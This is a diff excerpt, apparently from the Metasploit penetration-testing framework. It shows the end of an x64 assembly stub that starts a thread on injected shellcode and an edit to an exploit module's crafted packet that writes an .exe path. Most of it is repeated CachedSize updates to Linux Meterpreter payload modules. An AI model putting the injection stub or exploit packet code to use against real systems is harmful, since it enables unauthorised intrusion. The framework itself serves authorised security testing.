push rax ; lpThreadId
push rax ; dwCreationFlags
xor r9, r9 ; lpParameter
mov r8, 0x#{shellcode_address.to_s(16)} ; lpStartAddress
xor rdx, rdx ; dwStackSize
xor rcx, rcx ; lpThreadAttributes
mov rax, 0x#{create_thread_address.to_s(16)} ; &CreateThread
call rax
add rsp, 16
; restore arguments that were mangled
pop rcx
pop rdx
pop r8
pop r9
ret
}
Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string
end
end

View File

@ -117,8 +117,8 @@ class MetasploitModule < Msf::Exploit::Remote
pkt << "\x00\x00"
pkt << "\x0A"
pkt << "\x00"*31
pkt << "#{base}Documents and Settings\\All Users\\Application Data\\7T\\#{filename}\""
pkt << "\x00"*143
pkt << "#{base}#{filename}\""
pkt << "\x00"*163 #only for 1 caracter + .exe (i.exe for example)
return pkt
end

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
module MetasploitModule
CachedSize = 652264
CachedSize = 675048
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
module MetasploitModule
CachedSize = 652264
CachedSize = 675048
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
module MetasploitModule
CachedSize = 652264
CachedSize = 675048
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
module MetasploitModule
CachedSize = 645136
CachedSize = 668360
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
module MetasploitModule
CachedSize = 645136
CachedSize = 668360
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
module MetasploitModule
CachedSize = 645136
CachedSize = 668360
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
module MetasploitModule
CachedSize = 643904
CachedSize = 666624
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
module MetasploitModule
CachedSize = 643904
CachedSize = 666624
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
module MetasploitModule
CachedSize = 643904
CachedSize = 666624
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
module MetasploitModule
CachedSize = 1028600
CachedSize = 1059232
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
module MetasploitModule
CachedSize = 1028600
CachedSize = 1059232
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
module MetasploitModule
CachedSize = 1028600
CachedSize = 1059232
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
module MetasploitModule
CachedSize = 1007024
CachedSize = 1037012
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
module MetasploitModule
CachedSize = 1007024
CachedSize = 1037012
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
module MetasploitModule
CachedSize = 1007024
CachedSize = 1037012
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
module MetasploitModule
CachedSize = 1007120
CachedSize = 1036276
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
module MetasploitModule
CachedSize = 1007120
CachedSize = 1036276
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
module MetasploitModule
CachedSize = 1007120
CachedSize = 1036276
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
module MetasploitModule
CachedSize = 789100
CachedSize = 789164
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
module MetasploitModule
CachedSize = 789100
CachedSize = 789164
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
module MetasploitModule
CachedSize = 789100
CachedSize = 789164
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
module MetasploitModule
CachedSize = 790264
CachedSize = 855864
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
module MetasploitModule
CachedSize = 790264
CachedSize = 855864
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
module MetasploitModule
CachedSize = 790264
CachedSize = 855864
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux'
module MetasploitModule
CachedSize = 704512
CachedSize = 729120
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux'
module MetasploitModule
CachedSize = 704512
CachedSize = 729120
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux'
module MetasploitModule
CachedSize = 704512
CachedSize = 729120
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
module MetasploitModule
CachedSize = 744060
CachedSize = 772796
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
module MetasploitModule
CachedSize = 744060
CachedSize = 772796
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
module MetasploitModule
CachedSize = 744060
CachedSize = 772796
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux'
module MetasploitModule
CachedSize = 868848
CachedSize = 893496
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux'
module MetasploitModule
CachedSize = 868848
CachedSize = 893496
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux'
module MetasploitModule
CachedSize = 868848
CachedSize = 893496
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

Some files were not shown because too many files have changed in this diff Show More